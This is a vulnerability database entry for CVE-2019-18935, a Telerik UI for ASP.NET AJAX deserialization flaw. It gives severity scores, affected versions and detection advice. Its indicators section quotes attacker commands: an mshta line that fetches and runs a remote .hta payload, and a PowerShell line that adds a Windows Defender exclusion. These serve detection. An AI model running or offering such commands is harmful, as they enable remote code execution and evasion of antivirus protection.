cbcvebase.
CVE-2019-18935
published 2019-12-11

CVE-2019-18935: Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.74%
100.0th percentile
Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)

Affected

1 ranges
VendorProductVersion rangeFixed in
telerikui_for_asp.net_ajax2011.1.315 – 2020.1.114

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://48[.]218.138.60/a.txt
urlhttp://48[.]218.138[.]60/m.txt
urlmshta http://172[.]86.96.245/129-80.hta
ip172[.]86.96.245
ip48[.]218.138.60
command"C:\Windows\system32\reg.exe" query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
commandpowershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\
filename129-80.hta
  • MSHTA spawning network connections to retrieve .hta payloads is a strong indicator of post-exploitation activity following Telerik deserialization RCE; alert on mshta.exe making outbound HTTP connections.
  • RingQ loader uses .NET mixed-mode assemblies with embedded native C++ code to evade .NET analysis tools; standard dnSpy/ILSpy analysis will show empty managed code — use native debugger to inspect unmanaged entry points.
  • Tunneling/reverse proxy tools (Fuso, FRP) deployed post-exploitation to expose NAT-protected servers; detect unusual outbound persistent TCP connections from IIS servers to external IPs on non-standard ports.
  • ASPX .NET web shells deployed on Telerik servers after CVE-2019-18935 exploitation; monitor for new .aspx file creation in web root directories by w3wp.exe.
  • CVE-2019-18935 accounted for 8% of all exploitation attempts recorded by Fortinet IPS sensors in H2 2024, indicating active, widespread scanning and exploitation in the wild.
  • ·The deserialization exploit is only possible when encryption keys are known (e.g., via CVE-2017-11317 or CVE-2017-11357); patching or rotating keys breaks the exploit chain.
  • ·As of version 2020.1.114, a default setting prevents exploitation; in 2019.3.1023 a non-default setting can prevent exploitation, but earlier versions have no such protection.
  • ·The vulnerability is particularly dangerous because many ASP.NET applications may run older versions of Telerik UI, leaving victims exposed even if the applications themselves are patched.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_oracle8.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.